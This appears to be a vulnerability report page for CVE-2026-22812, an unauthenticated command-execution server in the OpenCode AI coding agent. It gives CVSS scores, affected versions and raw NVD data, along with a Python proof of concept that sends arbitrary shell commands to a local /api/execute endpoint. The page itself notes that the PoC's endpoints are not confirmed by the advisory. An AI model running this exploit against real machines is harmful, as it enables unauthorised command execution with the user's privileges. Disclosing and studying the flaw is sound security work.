Security Vulnerability Report
CVE-2026-22812 CVSS 8.8 HIGH

CVE-2026-22812

Published: 2026-01-12 23:15:53
Last Modified: 2026-01-21 15:15:00

Description

OpenCode is an open source AI coding agent. Prior to 1.0.216, OpenCode automatically starts an unauthenticated HTTP server that allows any local process (or any website via permissive CORS) to execute arbitrary shell commands with the user's privileges. This vulnerability is fixed in 1.0.216.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:anoma:opencode:*:*:*:*:*:-:*:* - VULNERABLE
OpenCode < 1.0.216

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-22812 PoC - OpenCode Unauthenticated RCE
# Target: OpenCode server running on localhost (default port 8080)
# Note: the endpoint paths and port used below are as given in this PoC;
# the advisory description on this page does not specify them.

TARGET_HOST = "http://localhost:8080"


def execute_command(cmd):
    """
    Execute arbitrary command on OpenCode server.
    This exploits the unauthenticated HTTP server vulnerability.
    """
    try:
        # The vulnerable endpoint accepts command execution requests
        endpoint = f"{TARGET_HOST}/api/execute"
        payload = {
            "command": cmd,
            "shell": True
        }
        headers = {
            "Content-Type": "application/json"
        }
        response = requests.post(endpoint, json=payload, headers=headers)
        if response.status_code == 200:
            result = response.json()
            return result.get("output", "")
        else:
            return f"Error: {response.status_code}"
    except requests.RequestException as e:
        return f"Connection failed: {str(e)}"


def check_vulnerability():
    """Check if target is vulnerable (responds on the status endpoint)."""
    try:
        response = requests.get(f"{TARGET_HOST}/api/status")
        return response.status_code == 200
    except requests.RequestException:
        return False


if __name__ == "__main__":
    print("[*] CVE-2026-22812 OpenCode RCE PoC")
    print("[*] Checking vulnerability...")
    if check_vulnerability():
        print("[+] Target is vulnerable!")
        print("[*] Executing test command...")
        result = execute_command("whoami")
        print(f"[+] Result: {result}")
    else:
        print("[-] Target is not vulnerable or not accessible")
```

References

https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh (Vendor Advisory, Exploit)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-22812",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-12T23:15:53.370",
    "lastModified": "2026-01-21T15:14:59.607",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenCode is an open source AI coding agent. Prior to 1.0.216, OpenCode automatically starts an unauthenticated HTTP server that allows any local process (or any website via permissive CORS) to execute arbitrary shell commands with the user's privileges. This vulnerability is fixed in 1.0.216."
      },
      {
        "lang": "es",
        "value": "OpenCode es un agente de codificación de IA de código abierto. Antes de la 1.0.216, OpenCode inicia automáticamente un servidor HTTP no autenticado que permite a cualquier proceso local (o a cualquier sitio web a través de CORS permisivo) ejecutar comandos de shell arbitrarios con los privilegios del usuario. Esta vulnerabilidad está corregida en la 1.0.216."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-306"},
          {"lang": "en", "value": "CWE-749"},
          {"lang": "en", "value": "CWE-942"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:anoma:opencode:*:*:*:*:*:-:*:*",
                "versionEndExcluding": "1.0.216",
                "matchCriteriaId": "168EE682-3321-4383-8874-2C9D8B949A2F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh",
        "source": "[email protected]",
        "tags": ["Vendor Advisory", "Exploit"]
      },
      {
        "url": "https://github.com/anomalyco/opencode/security/advisories/GHSA-vxw4-wv6m-9hhh",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Vendor Advisory", "Exploit"]
      }
    ]
  }
}
```